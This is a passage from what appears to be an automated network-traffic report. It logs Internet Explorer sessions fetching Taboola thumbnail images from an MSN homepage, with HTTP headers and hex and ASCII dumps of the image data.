                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC191INData Raw: f7 1f aa ae f1 d3 94 58 36 a6 89 4b 3b 48 e5 13 89 6e 18 f7 49 d0 55 c8 c9 d3 4d 35 cb d5 a0 99 2a 6d 84 4d 21 91 bf d8 40 a6 46 58 c8 51 fa 9c be 07 20 d8 d5 47 99 68 55 7d ba 95 49 5a 28 6a 42 60 6e 49 1c f1 61 c4 6e 4f 6f d1 93 e0 6a 95 c4 b7 3d 73 14 f5 dd 41 48 79 b4 6a c0 b3 01 c7 0a 70 33 f3 f3 cb e3 5b ca d8 9f 11 44 d3 5b fd 5b 2c 1d 21 67 58 f8 80 82 4c fe e5 00 7e 01 d1 af 14 cb 0a 57 69 26 08 5b 07 94 28 8c ea 03 65 80 56 3d 05 fc ea d5 cb 16 bc a8 b0 37 0a b2 24 4d 92 b2 c8 bc 98 ad 70 40 01 64 51 93 af a4 55 54 7b 71 b0 72 63 87 88 43 22 b2 03 97 0c 49 62 c1 74 d0 c5 f5 04 07 81 59 57 8c 9c 65 54 56 f6 30 62 0e 00 e3 90 06 99 d6 39 92 b4 a1 a2 fd 29 7b 21 b2 79 87 f1 81 9e c0 3d f4 0e 8a 6f 15 aa 09 71 66 bc dc 05 68 72 1d c7 02 3e 40 03 fc
                                                                                                                                                                                                                                                                                  Data Ascii: X6K;HnIUM5*mM!@FXQ GhU}IZ(jB`nIanOoj=sAHyjp3[D[[,!gXL~Wi&[(eV=7$Mp@dQUT{qrcC"IbtYWeTV0b9){!y=oqfhr>@
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC193INData Raw: 95 5e 39 3c bc c4 ec 08 c1 ce 30 17 49 52 dd ed dd 67 36 2c b1 68 ca 46 99 76 90 12 01 1c 54 03 f1 a7 96 9d 77 99 59 23 43 1c 44 34 c5 9e 30 cc 0f 25 50 4a af 7f 1f 6d 49 56 e5 5d bd cd 81 66 c0 8d 14 ce a1 63 e5 1b 3b 2a 90 b1 e2 42 b8 e2 48 ec ea 56 a7 3c 8a 20 9e 69 e1 9d 5e b2 47 c1 1d 4a c8 1d c3 48 39 ab 10 3a 3d e9 a5 dc 61 82 0f 30 96 d4 78 32 cf 22 bc 92 c6 c1 78 b2 8f 60 53 91 f1 f8 19 d2 bc 62 ed 57 86 06 e0 cc f6 6e c2 41 02 ba 3a 31 11 b1 19 8f 83 00 1b 56 2a c7 b5 ca 65 7a 96 66 9e 32 f1 bc c7 8a 96 96 36 28 47 05 23 ff 00 a4 11 a5 b5 5e 8c 96 3c 76 24 99 67 2a 82 66 0a fe 68 40 2a 55 88 46 52 48 20 31 1a 9a a7 d0 4f 28 81 f9 3d 98 d9 85 a9 a0 1c cc 68 49 08 d8 ed 49 19 1f 93 aa 56 e4 46 8b c5 15 82 c9 1d 88 de 29 12 b1 46 9d 86 10 44 ac ea
                                                                                                                                                                                                                                                                                  Data Ascii: ^9<0IRg6,hFvTwY#CD40%PJmIV]fc;*BHV< i^GJH9:=a0x2"x`SbWnA:1V*ezf26(G#^<v$g*fh@*UFRH 1O(=hIIVF)FD
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC194INData Raw: f6 5d f8 0e d1 35 02 45 fd 2a 5a a7 66 a1 e6 fa 5f 2c b2 87 32 31 72 14 ff 00 80 10 76 74 a9 66 cb 88 d6 b4 33 c9 c9 61 8d c9 58 e6 65 7e 05 18 60 94 03 f9 27 51 56 8f 12 19 55 11 40 70 fd b7 22 41 3f 3d f5 f2 74 6c 5c ad 49 3e aa b2 83 27 92 b5 c9 56 36 82 58 14 1f 22 08 b9 13 ff 00 13 86 d6 da 2f 6d b2 59 ad 5b 71 de 67 92 c9 b3 0c 92 f9 79 4d 02 37 13 28 03 0a 49 3d 6a 2b 97 ea 4e f0 58 dd 6e c4 e2 18 9d 09 0c 22 89 b8 b3 b6 9f 7b dc 7d 41 ba d0 bd b8 dc 95 8c 5f d1 a8 47 2a 59 68 e9 ac 4b c0 3b 2c 40 92 14 eb 7e 5b 16 36 b9 c7 a7 2f fa 8d d2 ea 43 04 3f a4 e2 1a b5 42 aa f0 c1 3c a5 3d af 5c 75 b2 ff 00 d4 bd 8b 78 40 d4 ec 5d bf d2 e4 34 c7 84 b6 8c 16 10 81 f6 65 65 d7 a8 28 6e 9b a6 d9 17 3f 4a d7 be 2c ed c9 65 e4 f0 c3 28 9d 0a 62 44 e6 5b 92 ae
                                                                                                                                                                                                                                                                                  Data Ascii: ]5E*Zf_,21rvtf3aXe~`'QVU@p"A?=tl\I>'V6X"/mY[qgyM7(I=j+NXn"{}A_G*YhK;,@~[6/C?B<=\ux@]4ee(n?J,e(bD[


Session ID: 22
Source IP: 192.168.2.4
Source Port: 49849
Destination IP: 151.101.1.44
Destination Port: 443
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: 2021-10-07 13:51:55 UTC
kBytes transferred: 38
Direction: OUT
Data:
GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: img.img-taboola.com
Connection: Keep-Alive

Timestamp: 2021-10-07 13:51:55 UTC
kBytes transferred: 57
Direction: IN
Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 22382
Server: nginx
Content-Type: image/jpeg
access-control-allow-headers: X-Requested-With
access-control-allow-origin: *
edge-cache-tag: 406382820122033804965516428113552605837,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
etag: "c8b18c873b56148c17d86e406dfe23da"
expiration: expiry-date="Sun, 05 Sep 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
last-modified: Thu, 05 Aug 2021 09:50:19 GMT
timing-allow-origin: *
x-ratelimit-limit: 101
x-ratelimit-remaining: 99
x-ratelimit-reset: 1
x-envoy-upstream-service-time: 46
X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801
Via: 1.1 varnish, 1.1 varnish
Cache-Control: public, max-age=31536000
Accept-Ranges: bytes
Date: Thu, 07 Oct 2021 13:51:55 GMT
Age: 3002495
X-Served-By: cache-wdc5537-WDC, cache-dca17757-DCA, cache-mxp6952-MXP
X-Cache: HIT, HIT, HIT
X-Cache-Hits: 1, 1, 1
X-Timer: S1633614715.279205,VS0,VE1
Vary: ImageFormat
X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg
X-vcl-time-ms: 1
                                                                                                                                                                                                                                                                                  Data Ascii: MF/r`-a$zAu};,[$Q]XU2XSRMd2t[Nv9#x`b;8ap3z7Q(,O`rs'CQHq|H#m=0wOmn]$.@*We[/JyQH'5qjmE&-uhD#l3z=qmTL%b#"")
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC71INData Raw: 45 96 25 6a 4b c5 d3 75 3b c8 05 d2 b4 6c 5a 3b 59 71 d5 24 1c 05 00 fb 46 a3 b9 8c 33 20 9d 24 57 4e 0f 70 c8 48 38 f0 c1 20 d4 42 f2 df ea c4 ea eb b9 40 dc c5 5c 0d a0 8f 26 22 a3 98 49 bd 43 ae 4e 19 70 0e ce 70 41 a9 45 d4 97 04 03 93 d3 64 c1 03 b9 fa e0 8a 56 11 c8 41 6c 63 6b 11 e6 71 cd 24 db 80 1b 4e 71 c7 27 91 4a a0 16 59 11 50 9c 06 1c 6d c7 88 f2 a9 26 28 06 c0 41 04 a8 1c 64 7f 0a 57 8e 28 1e 32 31 99 47 51 0a 75 90 79 c5 bb 23 91 da 8d f8 9e ea e2 68 fd 6d 04 8f 2c 4e e5 96 79 a3 6e 32 54 64 90 70 1a ac 2d b4 f7 99 ad 5d e0 b7 b2 b0 9e 29 44 db ad 63 81 5a 09 64 71 b9 b6 85 51 b4 27 1d aa e6 ca 1d 52 2b 8b cf 58 82 64 ba 8a 25 42 91 22 6d 68 62 2a c0 b1 0c d5 04 16 da c5 de a2 92 26 a1 6e 6c 21 b7 7d 36 d6 3b 86 5e ab b9 eb 07 46 c2 11 c3
                                                                                                                                                                                                                                                                                  Data Ascii: E%jKu;lZ;Yq$F3 $WNpH8 B@\&"ICNppAEdVAlckq$Nq'JYPm&(AdW(21GQuy#hm,Nyn2Tdp-])DcZdqQ'R+Xd%B"mhb*&nl!}6;^F
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC73INData Raw: 3b 58 30 ee 4e 47 6c d5 bc a2 48 89 ea 9b 88 d4 a9 07 04 32 b1 1d fb fb c1 ad 14 3d c2 f5 1a 18 67 69 cb 3f f4 e0 46 8f 77 bb 75 34 b1 fa bc 9d 52 5c 05 55 c7 07 0c 3d a3 51 dc 47 67 a9 34 57 ba 6c f3 3c 17 28 90 9f 62 52 bc 17 47 54 23 08 41 18 26 af b5 0d 4e 2b 3b 7b 7b fd 33 d4 5e 3b 98 65 87 f5 b7 21 64 11 2a 5c 2a 33 63 23 2c 83 03 95 ad 5b 55 f5 1b b8 9f 51 95 a2 0b 6b a5 59 dd 0d b1 a4 b2 a8 52 ce f2 12 ac d8 0b 53 5b c3 75 6f 70 d6 d7 eb 13 48 d1 cd 6e 9d 48 d5 51 33 9d f2 a8 46 ff 00 34 12 6a e7 6e 8f 6b 66 60 8a 54 8c 4a 2e 6e 6f 23 4e 83 e4 ab 4b 98 cb 30 64 4c 0c 54 51 91 2e d1 19 25 55 86 77 1c 0e 78 a8 a5 91 7a 85 70 a7 62 bb 0e 30 0f 75 14 f3 3b 42 42 c6 db 49 24 f2 de 23 27 c8 2d 13 ed 39 90 99 15 40 c6 47 db 2a 3c 38 19 ae a8 64 64 4e aa
                                                                                                                                                                                                                                                                                  Data Ascii: ;X0NGlH2=gi?Fwu4R\U=QGg4Wl<(bRGT#A&N+;{{3^;e!d*\*3c#,[UQkYRS[uopHnHQ3F4jnkf`TJ.no#NK0dLTQ.%Uwxzpb0u;BBI$#'-9@G*<8ddN
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC74INData Raw: dc 97 b6 d1 ad d3 d4 ee ec de 67 99 64 54 90 32 2c 6a 15 07 1c 31 ab 56 61 90 c8 b3 23 38 c7 7c ae 73 46 4c a1 5d fd f2 d1 1e 9f 3e 44 a8 52 7e 86 5c 63 b1 a4 b8 85 86 0c 53 22 ca 84 79 15 6c 8a d2 de 36 73 21 16 ca d6 27 a8 46 37 66 d8 a6 4d 7a 41 a1 cd 83 b5 04 f1 dd c3 f2 91 43 fe 2a d1 75 20 3e c5 e4 32 d9 bf e0 13 0a 9b 50 85 3b bd 84 89 75 f8 10 97 ad 4b 4d 94 9e 12 ea d9 e0 63 f7 48 05 71 f4 49 3d d2 7a 5e f7 92 22 70 c9 0c d6 d0 21 c2 82 5b ba 35 43 13 67 1d 3b 83 d0 6f c7 4a eb e6 ac 18 7d c4 51 04 7d 38 a6 00 8e 79 ad 1b 54 9b 03 75 d3 da 2a 4e 55 bf d7 47 b5 eb 5a f4 7d 88 25 52 19 fd 66 00 4f 9a 4e 0b fe 3a 5d 4f 4b ba d3 66 81 1e c6 db d5 ae a0 99 bf c5 cc 01 2c 30 ad dd 72 77 57 5f 4e b9 5b 68 65 d4 5b 4a 1d 3b d5 94 03 32 48 f3 31 e9 04 6e
                                                                                                                                                                                                                                                                                  Data Ascii: gdT2,j1Va#8|sFL]>DR~\cS"yl6s!'F7fMzAC*u >2P;uKMcHqI=z^"p![5Cg;oJ}Q}8yTu*NUGZ}%RfON:]OKf,0rwW_N[he[J;2H1n
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC75INData Raw: f3 b8 92 a4 0c 17 27 d9 34 e0 13 e2 31 4c 85 58 8c 1e 33 4c 7e 14 79 3d e9 9c 06 38 ca 76 2a 71 47 e1 8a 23 cb 22 8f 22 8e 4d 3a b2 b0 65 23 cc 51 e3 c7 e9 1d aa 3c 8f 10 30 29 6b 9a 66 f3 03 1c 0f 3e 68 a1 6f b2 4f 60 7e 14 ce 50 b0 0c 79 24 67 8c d3 00 1b e8 f1 ab 81 a8 bd b8 48 9e 07 31 49 83 3a 33 00 c0 8f 05 af 49 56 34 62 e0 47 2f 39 63 c9 ca bd 7a 5f f0 57 91 bf 27 af 4d 7b f1 ec 4e d5 e9 80 23 b1 f5 29 4d 7a 53 fe fe 9c e6 b5 e1 ee 7d 2b 20 fc d2 ae 1f 3d fa ba 48 3f f6 55 62 de 65 b4 76 fc c2 56 8e ff 00 d3 d3 64 15 e8 fb e7 ff 00 a4 99 3f b5 5a 07 1e 08 66 5c fe 3a d1 4f 20 8d b3 c8 3f 37 ad 3b 7e 08 62 97 c5 6b e5 a8 2d 5c 83 fc cb c8 98 56 a6 55 d7 04 2c f1 56 b6 8c 5b ea 91 13 60 7e d5 6b 58 f2 10 a1 03 f1 8a d7 61 20 f2 c9 6a 87 f3 90 d6 b5
                                                                                                                                                                                                                                                                                  Data Ascii: '41LX3L~y=8v*qG#""M:e#Q<0)kf>hoO`~Py$gH1I:3IV4bG/9cz_W'M{N#)MzS}+ =H?UbevVd?Zf\:O ?7;~bk-\VU,V[`~kXa j
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC77INData Raw: 95 81 3f 8b d4 fc 67 06 6b a5 50 7e 3b 10 56 8f 00 f0 de f2 c8 7f e6 0a d3 90 b7 84 56 65 ff 00 ad be b5 72 a7 c6 db 4b 0b fb c4 62 bd 24 4d e0 ed 47 d4 45 a0 f9 34 8b 45 9f 96 3d 7d 54 cf 9f f8 42 4a d2 e2 f7 af 5e 53 f8 b6 51 c6 7b 47 68 9f b8 99 1a b5 39 5f c9 24 8e 35 3f f5 66 ae 66 04 90 44 b7 32 b7 f5 0a 0a b2 6c 0c 0e a2 f5 7f e6 96 ad 26 16 3d d9 6c e1 46 f9 aa 8a 45 00 e7 81 9a 41 9f 25 14 68 9f a3 ed 0f a0 ac d7 ed 1d 9a 1f 74 a7 f5 9f 80 11 5e 18 a5 51 1f 0f 27 70 00 e0 63 1f 5a a7 e0 f0 cd b7 9f b8 76 ab 2b 35 b4 ba 9a 6d c9 11 b9 2c 0a 85 c6 38 ad 47 55 05 82 95 83 65 a8 50 be e9 55 4d 4f 79 2c d2 44 88 f7 7a dc cc 72 e4 0c 6d 81 10 78 f9 d5 b1 08 cc 01 75 92 51 ff 00 5a f2 55 9c 24 0c 7b 16 d0 a7 e4 94 ca 07 60 24 7c 0f df 48 d8 ed b9 41 fd
                                                                                                                                                                                                                                                                                  Data Ascii: ?gkP~;VVerKb$MGE4E=}TBJ^SQ{Gh9_$5?ffD2l&=lFEA%ht^Q'pcZv+5m,8GUePUMOy,DzrmxuQZU${`$|HA
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC78INData Raw: 45 19 23 b8 8b a6 54 85 90 20 7f 12 0e 47 8e 28 ee ce 0e 79 c1 1e 54 41 e7 9f ca bc 39 07 83 48 8a 41 20 9f 21 51 ec 20 e7 3d 88 a1 9c 60 01 da b3 e4 47 06 99 c1 c8 02 4c 64 0f e9 71 4c b1 26 43 31 75 e4 0e 48 e5 87 7a f6 06 03 a4 65 77 2f b8 92 70 6a 64 2c 33 d3 91 04 65 48 f3 cf 34 15 dd fd a6 67 dc 92 67 b1 1c 50 88 84 01 82 2b 1c 9e f9 3e 03 9a 46 04 fb 20 e7 24 f9 71 51 a8 70 c0 ca 15 95 55 00 e4 f8 f1 c7 34 d2 46 18 8e a4 64 72 33 ef e6 96 29 e1 70 20 2e 0f da e2 4e c0 1e dc 54 4a ac 80 18 a6 6e 9a 91 82 7c 68 f2 41 c8 c9 07 14 76 f2 09 de 0e 3e 55 24 4c 03 11 bf 05 5b 9e e2 a1 76 c2 5c 61 64 0a 02 91 c8 a4 4b 47 94 94 2f 26 d9 a6 48 ce e6 21 0e 09 51 8a 68 5e 38 c3 74 c8 3d cf bc d3 ec 23 3c e5 43 29 35 1b 80 a5 f6 aa 94 da b8 2c 73 c7 7a 03 23 39
                                                                                                                                                                                                                                                                                  Data Ascii: E#T G(yTA9HA !Q =`GLdqL&C1uHzew/pjd,3eH4ggP+>F $qQpU4Fdr3)p .NTJn|hAv>U$L[v\adKG/&H!Qh^8t=#<C)5,sz#9
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC79INData Raw: 00 7e ea 2a 30 70 28 91 9f 68 57 54 b6 7e d0 45 1f 13 c9 f9 03 50 c4 19 79 55 52 c4 13 e4 5a a6 68 f8 d8 d1 b0 19 e3 c7 68 52 3e 74 aa eb 0c 65 82 1e 09 55 c3 1e 47 7c 83 49 03 92 a2 36 18 6c 64 f0 c7 81 cd 2c 80 18 82 b7 24 b6 c1 c9 20 d5 c4 91 a0 01 d3 23 c0 79 13 58 63 d7 75 50 46 4f 66 c3 37 b3 e0 08 18 14 22 4f 64 30 03 3c 67 ef a3 bb 77 4c 94 18 f1 0c 54 67 b0 6d b8 26 84 d2 13 b9 10 30 55 87 24 e1 07 1c 28 35 2b 3a 45 2d c1 c9 ec bc 28 23 b8 38 6f 02 28 7a b2 b8 43 d3 1b 58 ef 27 19 0b dd 4d 4f a7 32 e4 87 b6 25 43 16 ef be 36 0c ad 5f ca 31 39 8e 37 dc a6 29 1b 73 6d 60 f9 ca e1 94 91 c5 07 80 ab 18 94 92 a1 59 47 19 19 3c 9c 92 79 c5 5a b2 e7 98 63 2c 1c 1c 64 80 ec 3b 00 41 35 d1 2c 4a ed 50 37 05 c9 3c b6 05 2c b3 42 11 79 51 b7 03 2c a7 bf 3c
                                                                                                                                                                                                                                                                                  Data Ascii: ~*0p(hWT~EPyURZhhR>teUG|I6ld,$ #yXcuPFOf7"Od0<gwLTgm&0U$(5+:E-(#8o(zCX'MO2%C6_197)sm`YG<yZc,d;A5,JP7<,ByQ,<


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.4 | 49852 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:55 UTC | 80 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: img.img-taboola.com
Connection: Keep-Alive
2021-10-07 13:51:55 UTC | 149 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 11572
Server: nginx
Content-Type: image/jpeg
access-control-allow-headers: X-Requested-With
access-control-allow-origin: *
edge-cache-tag: 375793870887832675241171480995171816983,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
etag: "c5b7ab143a42cdf3600cfb874fc63354"
expiration: expiry-date="Mon, 11 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days"
last-modified: Fri, 10 Sep 2021 09:29:36 GMT
timing-allow-origin: *
x-ratelimit-limit: 101
x-ratelimit-remaining: 100
x-ratelimit-reset: 1
x-envoy-upstream-service-time: 23
X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb802
Via: 1.1 varnish, 1.1 varnish
Cache-Control: public, max-age=31536000
Accept-Ranges: bytes
Date: Thu, 07 Oct 2021 13:51:55 GMT
Age: 4552
X-Served-By: cache-wdc5554-WDC, cache-dca17738-DCA, cache-mxp6951-MXP
X-Cache: HIT, MISS, MISS
X-Cache-Hits: 1, 0, 0
X-Timer: S1633614715.345872,VS0,VE144
Vary: ImageFormat
X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg
X-vcl-time-ms: 144
                                                                                                                                                                                                                                                                                  Data Ascii: <rf{bBl.j*Ec'n4x$>RwdcmimYvSPImT;7L8:dWd6IT:nQ4n/G"I'=dJtO_c;bN{r=2H&vO|R[^Y<w*Q.RXGILLsQ'xiIt"B&JM7F5(F\;D
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC160INData Raw: 87 b1 9a 6b 01 61 5d 08 27 fb de 1d 4f 48 39 b9 e8 1c 4d d6 f2 cf 90 a3 f2 32 60 2e 06 71 b1 9a a8 94 f5 7c c2 60 2c 86 e8 66 35 60 cb 79 2c a3 78 18 0c 13 2c c2 5c da 6d ca e9 5a 85 44 6f 86 52 26 50 95 fe a6 0f 93 36 98 e6 4b 9d 8d fa cd 61 ea 13 98 aa 00 fb 94 c1 a0 c1 90 2f 3e a0 65 1e 45 06 1f 1e bd d5 16 06 25 7d 77 12 d8 98 5a 7b 8f 79 8d 5c 8e 25 82 71 95 6d fc b7 97 75 82 e4 5e 2d 3a 4a a1 99 89 b0 17 94 ff 00 b9 44 fb 7a a5 2a b4 d8 60 8b 12 27 8b 46 fe 86 81 c8 1f ec af db 79 6a 44 02 be c2 5c 72 e9 2d ee de d3 c4 70 a7 2e 61 14 c2 6c 26 b0 c3 33 48 fd a6 14 7b 59 a3 38 44 f5 91 35 5b 00 98 0c 55 a6 2b c1 e4 f6 9e cb 35 52 a9 4c 29 b6 08 b4 d1 42 95 0c 33 75 7f 73 29 8a b5 99 6e 40 fd 26 71 14 1a 8b 80 a1 9a f4 de 1a e5 17 35 69 1e 90 a9 17 ba
                                                                                                                                                                                                                                                                                  Data Ascii: ka]'OH9M2`.q|`,f5`y,x,\mZDoR&P6Ka/>eE%}wZ{y\%qmu^-:JDz*`'FyjD\r-p.al&3H{Y8D5[U+5RL)B3us)n@&q5i
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC161INData Raw: a8 ba f0 df 8e 70 ea 36 aa 70 b5 ff 00 e3 52 38 e2 b8 ca 46 ad 1a 1f a0 2f e8 0d 29 70 81 18 52 e2 68 52 5b 2b 82 32 1b dc 82 27 d0 e2 d1 28 f1 7d aa ae 11 8c f5 9b 4b 31 63 cc cc 5e 5d 61 bb 0b 8b c1 a9 16 dc be a2 0f ec 0e 9c ad 8d e6 ae f3 55 45 21 b3 36 5b 13 d6 6a a2 ed e9 e5 8f 22 d7 e1 2a 2f 83 c7 70 cc 03 2d 5a 0c 73 83 d4 44 6e 12 a5 14 7a 05 05 97 41 17 00 01 b4 bf 87 c4 0e 26 88 b6 f4 ea 40 dc 27 16 85 4a ec 54 9f 6f 83 90 66 b5 43 aa 85 63 8f 12 91 d9 a6 6d 91 33 2e 04 06 dd 06 f0 5c 60 88 7c 32 40 2d d4 40 f4 9c 00 0c b6 79 dc 54 ca db f7 46 4b dc 38 be 31 00 16 9b 13 83 34 7a 70 a6 6b 23 a0 f7 32 c7 cb 79 f4 6b 16 a9 f8 7b 31 c2 3f 5a 52 dc 5f 0b bf fd ca 67 75 33 4f 1b c3 53 5a 9c 47 0d b3 04 3f ac 7b ac 07 f1 5e 00 1a b4 3d ea 2e ee 93 07
                                                                                                                                                                                                                                                                                  Data Ascii: p6pR8F/)pRhR[+2'(}K1c^]aUE!6[j"*/p-ZsDnzA&@'JTofCcm3.\`|2@-@yTFK814zpk#2yk{1?ZR_gu3OSZG?{^=.


Session ID: 24
Source IP: 192.168.2.4
Source Port: 49851
Destination IP: 151.101.1.44
Destination Port: 443
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: 2021-10-07 13:51:55 UTC | kBytes transferred: 80 | Direction: OUT | Data:
GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb3b730df929ed7084f256b53000dc655.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: img.img-taboola.com
Connection: Keep-Alive

Timestamp: 2021-10-07 13:51:55 UTC | kBytes transferred: 81 | Direction: IN | Data:
HTTP/1.1 200 OK
Connection: close
Content-Length: 20805
Server: nginx
Content-Type: image/jpeg
access-control-allow-headers: X-Requested-With
access-control-allow-origin: *
edge-cache-tag: 457671681042610906711952871495871764303,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
etag: "54e1a089c81ac4733c601033b8173199"
last-modified: Sun, 26 Sep 2021 19:07:54 GMT
status: 200 OK
timing-allow-origin: *
x-ratelimit-limit: 101
x-ratelimit-remaining: 99
x-ratelimit-reset: 1
x-request-id: fac2d5210125631f33479e087d783aa0
x-envoy-upstream-service-time: 68
X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb204
Cache-Control: public, max-age=31536000
Accept-Ranges: bytes
Date: Thu, 07 Oct 2021 13:51:55 GMT
Via: 1.1 varnish
Age: 626331
X-Served-By: cache-wdc5544-WDC, cache-mxp6949-MXP
X-Cache: HIT, HIT
X-Cache-Hits: 1, 1
X-Timer: S1633614715.347365,VS0,VE1
Vary: ImageFormat
X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb3b730df929ed7084f256b53000dc655.jpg
X-vcl-time-ms: 1
                                                                                                                                                                                                                                                                                  Data Ascii: MpcS1*9nP6h#\\JBqCw28Osj@]>p8jR^#rj,5;-v75\sr+~g@{Z[-~C]4)Ou.Bs)z0HUAvh\qB}TNru:v&9\?b!VPerH
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC97INData Raw: 0b 97 c7 7b 67 2a 59 b9 31 64 56 bb 6b 77 61 65 6c eb fe 34 a9 b1 95 b3 b1 44 3b 01 c1 6a 66 9e d3 5d 9c f9 24 9d 51 6c 37 3e d8 fc 43 12 29 28 4f 67 a2 84 93 12 b1 18 cc 47 2b 82 47 65 a2 a6 24 68 b4 1d db 51 38 00 50 63 1e 0c 50 9d c2 10 73 96 f5 6f d0 12 38 c6 59 8d 2b 29 c2 a5 bf 65 50 72 00 23 f9 d2 ab 9d b0 38 02 99 e0 96 69 45 bf 88 e5 d1 53 d0 66 be 5e 08 94 bb 30 8c c7 e2 0d 8a 84 18 f3 13 8f 43 46 d2 49 d6 39 0d ac e7 c3 0f 67 22 89 23 10 11 af c8 17 8a 10 db db fc 46 fd 55 ef ae 65 2d 2b c8 f1 78 08 07 01 54 02 59 8d 2a 5d 27 c7 37 3d 35 26 18 26 e2 d2 4b 40 c7 53 7d f8 78 6a 39 fa 4f 44 bb b7 82 48 12 72 ff 00 2c f7 fa ca b8 4e 06 b3 0e 18 fa e2 bc 69 65 f8 aa e9 a7 7f 7f 06 0f c0 c6 de f7 a6 dc c1 36 39 d1 24 65 4f f2 34 a9 17 9f c3 ff 00 46
                                                                                                                                                                                                                                                                                  Data Ascii: {g*Y1dVkwael4D;jf]$Ql7>C)(OgG+Ge$hQ8PcPso8Y+)ePr#8iESf^0CFI9g"#FUe-+xTY*]'7=5&&K@S}xj9ODHr,Nie69$eO4F
                                                                                                                                                                                                                                                                                  2021-10-07 13:51:55 UTC98INData Raw: ea b6 57 eb 1c cc 59 d0 db c7 2a e0 af 60 e6 6c 91 ce 05 12 e7 75 0d b0 7d 23 38 56 ec 45 17 21 43 2e c1 5b 0c 72 31 e8 47 14 86 48 d0 87 0a 0f e4 b2 7f 4f 6a 1a d4 8d 24 8f ab 7e 69 6d 6d ed 50 c9 75 78 e4 08 d6 10 b9 62 58 e0 01 8a bd 83 fe 9d 1b b3 02 dd 29 d1 2f 5a b8 4d c3 c8 0e 18 5a 82 0e 91 f7 9a bb b0 4b b7 1e 12 36 5a 39 14 0c ee 72 c0 1c 1d ab 0c 8e 89 28 00 28 04 8a 7b 7b e8 5c 34 72 c2 70 7d 8e 45 22 df db 00 27 45 e1 d7 81 20 1f 84 3a 30 21 95 86 41 07 90 69 a7 b0 62 5e 5b 75 c9 7b 73 dc a8 1c a7 f3 15 6c 6e e6 c4 96 31 3b 8f ac 1f f1 82 93 b9 1f 6e 7b f6 35 6f d4 3a e5 ec 92 fe a8 12 06 2b 0c 52 87 77 9e e1 86 e1 13 3b a0 3a e4 35 34 3d 1f a4 74 ae a5 d5 7a 85 dc c1 62 92 f6 fa 55 62 81 70 30 a5 a5 6c 85 5a 74 3d 72 e8 09 e0 8d cc 70 cf 34
